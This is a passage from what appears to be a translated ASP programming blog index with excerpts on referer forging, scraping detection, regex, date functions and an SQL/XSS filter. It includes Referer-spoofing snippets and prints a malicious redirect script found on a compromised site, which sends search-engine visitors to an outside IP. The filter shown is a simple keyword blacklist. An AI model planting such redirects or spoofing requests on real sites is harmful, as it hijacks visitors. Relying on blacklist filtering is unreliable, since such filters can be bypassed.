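Forging HTTP-REFERER in ASP, PHP and .NET, and how to defend against a forged REFERER
[ 2012-01-10 09:01:26 | Author: admin ]
The HTTP-REFERER variable has become less and less reliable; it can be forged outright.
The forging methods are as follows:
ASP/Visual Basic code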
dim http
set http=server.createobject("MSXML2.XMLHTTP") ' MSXML2.serverXMLHTTP also works
Http.open "GET",url,false
Http.setRequestHeader "Referer","http://www.52news.com/"
Http.send()
PHP (requires curl to be installed):
PHP code
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://www.52news.com/xxx.asp");
curl_setopt ($ch, CURLOPT_REFERER, "http://www.52news.com/");
...
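A method for blocking scraping via MSXML2.XMLHTTP
[ 2012-01-10 08:52:03 | Author: admin ]
Attack and defense strategies in data scraping: a new method to prevent data from being scraped
HTTP request headers obtained with Request.ServerVariables("all_http") or Request.ServerVariables("ALL_RAW")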
HTTP_ACCEPT:*/*
HTTP_ACCEPT_LANGUAGE:zh-cn
HTTP_CONNECTION:Keep-Alive
HTTP_HOST:192.168.1.54:81
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP_COOKIE:ASPSESSIONIDASBBCRRQ=NDMJNFOCOEMAMJHEKDDEHKAP
HTTP_ACCEPT_ENCODING:gzip, deflate
HTTP headers when the page is scraped by MSXML2.XMLHTTP
...
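Demo code for extracting data with regular expressions in ASP
[ 2011-12-23 10:52:13 | Author: admin ]
P.S. Regular expressions are quite convenient to use; if you forget the syntax, go review it at w3school.
<%
'Demo 1
dim str,reg
str="http://www.abc.com/abc_1_2/"
Set reg=new regexp
reg.global=True 'Match across the whole string
reg.ignorecase=True 'Ignore case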
reg.pattern="http:\/\/www\.abc\.com\/abc_(\d+)_(\d+)\/"
str=reg.Replace(str,"http://www.abc.com/abc.asp?id=$1&Nid=$2")
response.write str
Set reg=nothing
%>
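ASP functions for getting the week number of the current date and the date range of a given week number
[ 2011-12-05 08:33:34 | Author: admin ]
Function for getting the week number of the current date: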
Function GetWeekNo(InputDate)
dim pytY,pytNewYear,pytNewYearWeek,pytAllDay,pytBanWeek,NumWeek
NumWeek = 0
pytY = Year(InputDate)
pytNewYear=pytY &"-1-1"
pytNewYearWeek = Weekday(pytNewYear)
pytAllDay = DateDiff("d",pytNewYear,InputDate)
pytBanWeek = 8-pytNewYearWeek
if pytBanWeek<7 Then
NumWeek = 1
pytAllDay = pytAllDay - pytBanWeek
end if
tempx = pytAllDay/7
...
An ASP function for reading a group-buying API
[ 2011-11-01 14:35:21 | Author: admin ]
Source: http://dev.tot.name/asp/html/20101123/20101123133239.htm
Below is the data from the group-buying XML file:
<?xml version="1.0" encoding="utf-8" ?>
<urlset>
<url>
<loc>http://www.totcms.com/team.php?id=9</loc>
<data>
<display>
<website>totcms</website>
<siteurl>http://www.totcms.com</siteurl>
<city>全国</city>
<title>卖疯啦!超推荐之Dior史上最佳睫毛膏!36元抢购迪奥BlackOut后台炫黑睫毛膏!内含古埃及艳后专用睫毛碳粉,超黑妆效,极致惊艳埃及艳后的惊艳妆效你真的可以轻松拥有</title>
...
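A website was running slowly, and the IIS logs showed a large number of timeouts
[ 2011-08-04 15:10:31 | Author: admin ]
In the logs, several frequently accessed files were returning timeout errors.
The code in these files is very simple and looks like it is used for inflating traffic and redirecting to ads; deleting it is enough.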
<%
Dim REFERER
REFERER = Cstr(Request.ServerVariables("HTTP_REFERER"))
Dim server
server = request.ServerVariables("SERVER_NAME")
If InStr(REFERER,"baidu.com") > 0 Or InStr(REFERER,"google") > 0 Or InStr(REFERER,"soso") > 0 Or InStr(REFERER,"sogou") > 0 Then
Randomize
Response.Redirect("http://121.12.117.3:808/cxl/mxd.html?" & server)
...
Comparing date and time types in ASP with Access
[ 2011-03-05 15:15:17 | Author: admin ]
Getting rows from Access in ASP where the date field is later than 2009-9-9
Or
select * from [table] where [datetime] > #2009-9-9#
Or
SELECT * FROM [table] WHERE datediff("d",#2009-9-9#,[datetime])>0
ASP filter functions for SQL injection and XSS
[ 2011-01-27 13:43:26 | Author: admin ]
'*********************************************
'Check the SQL string and filter it
'*********************************************
function ChkSql(mysql)
if isnull(mysql) or isempty(mysql) or mysql="" then
mysql = ""
elseif IsNumeric(mysql) then
mysql = mysql
else
mysql = trim(mysql)
mysql = replace(mysql,"'","‘",1,-1,1) 'Case-insensitive
mysql = replace(mysql,"exec","e xec",1,-1,1)
...